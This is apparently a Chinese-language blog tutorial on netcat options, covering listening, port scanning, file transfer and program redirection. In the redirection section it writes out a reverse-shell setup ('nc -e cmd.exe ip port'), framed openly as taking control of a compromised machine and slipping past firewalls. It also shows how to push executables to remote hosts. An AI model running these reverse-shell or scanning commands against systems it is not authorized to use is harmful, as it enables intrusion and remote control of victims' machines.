nc 使用例項

2022-03-20 06:53:48 字數 3504 閱讀 1246

nc.exe -h即可看到各引數的使用方法。

基本格式:nc [-options] hostname port[s] [ports] ...

nc -l -p port [options] [hostname] [port]

-d 後台模式

-e prog 程式重定向,一旦連線,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-g num source-routing pointer: 4, 8, 12, ...

-h 幫助資訊

-i secs 延時的間隔

-l 監聽模式,用於入站連線

-l 連線關閉後,仍然繼續監聽

-n 指定數字的ip位址,不能用hostname

-o file 記錄16進製制的傳輸

-p port 本地埠號

-r 隨機本地及遠端埠

-s addr 本地源位址

-t 使用telnet互動方式

-u udp模式

-v 詳細輸出--用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉--用於掃瞄時

埠的表示方法可寫為m-n的範圍格式。

命令1:監聽命令

nc -l -p port

nc -l -p port > e:\log.dat

nc -l -v -p port

引數解釋:

-l:監聽埠,監聽入站資訊

-p:後跟本地埠號

-v:顯示埠的資訊,如果使用-vv的話,則會顯示埠更詳細的資訊

nc -l -p 80

這個很簡單,監聽80埠

如果機器上執行這個命令,埠80被認為是開放的,可以欺騙掃瞄器

nc -l -p 80 > e:\log.dat

將詳細資訊寫入e盤log.dat的日誌檔案

nc -l -v -p 80

和上邊命令相似,會直接顯示資訊在執行著nc的螢幕上。

實踐:例如:nc -l -v -p 80

然後在瀏覽器中輸入本機ip:127.0.0.1

命令2:程式定向(**shell的方法)

nc -l -p port -t -e cmd.exe

本地機: nc -l -p port 或 nc -l -v -p port

目標機:nc -e cmd.exe ip port

引數解釋:

-l、-p兩個引數已經解釋過了

-e:作用就是程式定向

-t:以telnet的形式來應答

例子nc -l -p 5277 -t -e cmd.exe

千萬不要執行在自己的機器上,如果執行了,你機器就會變成一台telnet的伺服器了。

命令解釋為:監聽本地埠5277的入站資訊,同時將cmd.exe這個程式,重定向到埠5277上,當有人連線的時候,就讓程式cmd.exe以telnet的形式來響應連線要求。

說白了,其實就是讓他成為一台telnet的肉雞。

所以  -e cmd.exe 這個命令要執行在你的肉雞上。如下: 

local machine(主人機器,需要先啟動):nc -l -p port ( or nc -l -v -p port )

remote machine(被攻陷的機器,肉雞):nc -e cmd.exe ip port

這樣肉雞執行「nc -e cmd.exe ip port」命令時,主人機器直接變成了肉雞的cmd命令視窗,可以對肉雞操控。也就是說肉雞可以位於防火牆內部,可以連線到主人的外網機器。等於實現了反向**。

大家知道灰鴿子和神偷吧,這兩款工具都是利用了**埠型的木馬,

什麼叫**埠?

就是說,當對方中馬後,不用你主動和對方連線,也就是說不用從你的client端向對方主機上執行的server端傳送請求連線,而是對方主動來連線你這樣就可以使很多防火牆失效,因為很多防火牆都不檢查出站請求的。這裡這兩個命令結合在一起後,於那兩款木馬可以說有異曲同工之效。

示例: 

本地執行:nc -l -p 5277 (監聽本地5277埠)或者 nc -l -v -p 5277

然後在遠端機器肉雞上,想辦法執行 nc -e cmd.exe ip 5277

這樣就是**~~在本地主人機器上得到了乙個shell

命令3:掃瞄埠

nc -v ip port

nc -v -z ip port-port

nc -v -z -u ip port-port

引數解釋:

-z:將輸入輸出關掉,在掃瞄時使用

nc -v ip port

這個命令是針對某乙個埠進行掃瞄

例如:nc -v ip 135

掃瞄遠端主機的135埠,這樣獲得了該埠的一些簡單資訊,但是針對某些埠,我們還可以獲得更多的資訊

例如:80埠

我們可以使用nc -v ip 80 然後使用get方法來獲得對方的web伺服器的資訊

nc -v -z ip port-port

這個命令是用來掃瞄的乙個命令,這個命令用於快速掃瞄tcp埠,而port-port則是指定了掃瞄的埠範圍

例如:nc -v -z ip 1-200

可以看到我機器上的1-200的tcp埠的開放情況

nc -v -z -u ip port-port

這個命令比上個命令多了個-u,這個命令的作用仍然是掃瞄埠,只是多了乙個-u的引數,是用來掃udp埠的

例如:nc -v -z -u ip 1-200

這個命令就會掃1-200的udp埠

命令4:傳送檔案(hoho,i like)

local machine:nc -v -n ip port < x:\svr.exe

remote machine:nc -v -l -p port > y:\svr.exe

引數解釋:

這兩個命令結合起來是用來傳送檔案的

首先,在遠端機上執行命令:

nc -v -l -p 5277 > c:\pulist.exe

這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277埠

並把接受到的資訊資料寫到c:\pulist.exe中

這時候在本地機上執行

nc -v -n ip 5277 < e:\hack\pulist.exe

這個命令的意思就是,從本地e盤跟目錄中讀取pulist.exe檔案的內容,並把這些資料傳送到ip的5277埠上

這樣遠端主機就會自動建立乙個pulist.exe檔案。

1)連線到remote主機,例子:

格式:nc -nvv 192.168.x.x 80

講解:連到192.168.x.x的tcp80埠

2)監聽local主機,例子:

格式:nc -l -p 80

講解:監聽本機的tcp80埠

3)掃瞄遠端主機,例子:

格式:nc -nvv -w2 -z 192.168.x.x 80-445

講解:掃瞄192.168.x.x的tcp80到tcp445的所有埠

nc使用筆記

g 閘道器 設定路由器躍程通訊網關,最多可設定8個。g 指向器數目 設定 路由指向器,其數值為4的倍數。i 延遲秒數 設定時間間隔,以便傳送資訊及掃瞄通訊埠。l 使用監聽模式,管控傳入的資料。n 直接使用ip位址,而不通過網域名稱伺服器。o 輸出檔案 指定檔名稱,把往來傳輸的資料以16進製制字碼傾倒...

nc 命令使用詳解

nc 命令介紹 我們通過 ll 命令檢視nc 命令 benchmarks ll usr bin nc lrwxrwxrwx.1 root root 4 feb 19 19 09 usr bin nc ncat name cat concatenate files and print on the s...

NC 的簡單使用

netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧 乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很...